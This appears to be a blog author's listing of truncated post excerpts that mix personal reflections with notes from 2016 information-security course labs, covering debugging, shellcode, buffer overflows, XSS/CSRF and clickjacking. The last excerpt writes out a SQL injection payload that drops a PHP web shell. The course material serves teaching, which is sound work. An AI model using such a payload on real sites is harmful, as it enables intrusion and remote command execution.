ailx10

一眨眼6年过去了，那个闪现无CD的计算机病毒课，致敬可爱的老师～我从没有见过极光出现的村落也没有见过有人在深夜放烟火开发调试：vs2012 / ollydbg使用ollydbg单步跟踪程序运行，并记录以下程序运行信息程序被加载到内存的基址main函数的第一条指令所在的地址栈基址在调用printf函数之前的栈顶地址CPU在运行main函数的第一条指令push ebp时的esp寄存器的值CPU在退出m...

青春就像一场烟火，6年一去不复返，再看已是物是人非～晚星就像你的眼睛杀人又放火你什么都没有说 野风惊扰我实验1:熟练使用OD本程序附带一个hello.exe程序 使用ollydbg调试该程序完成下列任务列出hello.exe加载到内存之后 共被分为几个节 每个节的名字是什么 所占内存的起始地址观察地址0x0040100F这个地址对应的指令在0x0040100F设置断点 观察栈中[ebp-4]放置的...

这6年真的漫长，仿佛经历过许多，又仿佛虚幻，什么也没有经历～三千里 偶然见过你花园里 有裙翩舞起灯光底 抖落了晨曦在1980的漠河舞厅实验1：编写二进制代码 弹出MessageBox对话框 并测试运行要求：首先写汇编代码片段完成以下功能调用MessageBoxA()函数 弹出一个对话框 显示"I'm hacked!"字符串然后请提取出这些汇编代码的二进制编码 放到全局字符数组char code[]...

6年的差距有多大，是小学生和大学生的差距，初中3年，高中又3年～如果有时间你会来看一看我吧看大雪如何衰老的我的眼睛如何融化烫烫烫：打印25500截断字符串实验1：完成函数GetIAFromImportTable() 遍历当前进程test.exe模块的导入地址表，找到其中存放MessageBoxA()入口地址的地址 打印出该地址以及其中存在的值GetIAFromImportTable()的框架如下：...

现在是2021年11月，最近和领导合作写了一篇安全运营小论文，3000多字，本想着发个Freebuf差不多就行了，其中一个领导建议发期刊，这周进行了2轮修改，自我感觉还不错，今天金博士说写的不行，计算公式太具体显得low了，但是改改还是比较有希望的。今天更新一下信息安全实验，这是2016年我用Makedown写的，我们上课是英文讲义，随便看看吧。Excrcise1Now, you can writ...

刚刚上国家知识产权局看了一眼，我的第一作者发明专利终于有一个进入实审了，一眨眼已经过去一年了，不禁感慨，时间过的真快啊，遥想当年，我还是个萌新，现在都已经快成长为大佬了。等哪天专利通过了，我要开一场知乎Live来讲一讲创作心得体会。今天照旧带来我的2016年信息安全实验第二课，一起学习进步～发明名称申请日案件状态主机****的告警方法、装置、设备及存储介质2020-10-15等待实审提案一种***...

虚拟黑客故事：哦，老伙计，这已经是4年前的故事了，首先介绍一个小场景，萧炎是乌坦城委托的黑客，需要入侵云岚宗的护山大阵系统，获取机密文件。乌坦城和云岚宗在公关上是表面兄弟，有业务往来，通过社会工程学套路得到：云岚宗的系统上栈不可执行，在第一期live中介绍的，（传送门：【软件安全】缓冲区溢出攻防）缓冲区溢出攻击无法奏效。萧炎设计骗的一个云岚宗的一个普通弟子帐号密码，登录到了系统后台，于是开始了re...

一眨眼毕业好多年了，不知道老师还记不记得我？真后悔年轻的时候在学校，没有好好学习，现在厂里搬砖汗如雨下，老板还在数你这个月上班迟到几天，还在给你算加班时长排名是否靠后。少壮不努力，老大徒伤悲，现在不懂没事，以后自然而然就懂了。今天带来的是，中科大信息安全第三课：权限分离，不过说实话，这个时候（2016年课程后半学期）我的成绩已经有点跟不上节奏了~Exercise1In order to gain ...

写在6年前，一眨眼2021年都快过完了，今年大部分闲暇时间都给了考证书，不听老人言，吃亏在眼前，想想20年后的自己，趁早把信息安全最高荣誉CISSP（国际信息安全专家）证书考了，我吃了大半年的亏，今天来不及解释了，快~CISSP通关经验分享 如何自学通过CISSP考试 其实我一直不明白，为什么Web安全开篇要讲HTTPS，有机会我一定要问问老师，当初为啥要这么设计，不知道现在学弟学妹，Web安全实...

我想很多人最后终究都会慢慢变得平凡的无声的，2016年乌云还在，我刚刚踏入信息安全的圈子，那时候网络上很喧嚣，现在2021年，网络安全热度不升反降，知乎圆桌都不讨论了，真奇怪。我看到冷叔创办的“安全师”论坛，也倒闭了，安全大咖群里也没人说话了。Exercise1There are many bugs and vulnerabilities in the current utility for tr...

写在6年前，很迷茫，当时为了学习Web安全，还买了JavaScript大象书，然并卵，其实对于信息安全这么重视实战的课程，胡乱看书，其实事倍功半，比如我就走过路过一堆天坑，以后慢慢来写，一眨眼2021年都快过完了，再啰嗦一下xss和csrf 漏洞实验~还是那句老话，抓紧时间把证书考了，回答一下：cisp和cissp的区别，一个是国内，一个是国际，cisp不用考，很水，跟花钱买证没区别，工作之后，公...

手机网页乱点点点，你就中计了唐三正在经历海神九考，其中一考就是点击劫持胡列娜给唐三的微信上发了一个神秘网址，并留言：给你看大宝贝唐三趁天黑无人的时候访问网址，一顿点击，输入信息，完成娜娜的考试沉醉其中，情不自禁的感慨，过去不知娜娜好，错把小舞当做宝5分钟后，唐三的银行卡被胡列娜转走了8万块钱点击劫持 click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠...

有一只羊，自己洗好了澡，自己脱好了毛，最后撒上香料，走到狼的面前，祈求狼不要吃她。狼吃完了羊以后，把骨头扔给了狗，狗还舍不得吃，舔的津津有味。那只羊到死都觉得，狗都不配舔她的骨头。sql注入获取webshell寻找sql注入页面，操作数据库的地方向网站写入sql语句' union select 1,2, '<?php system($_GET["cmd"]);?>' into outf...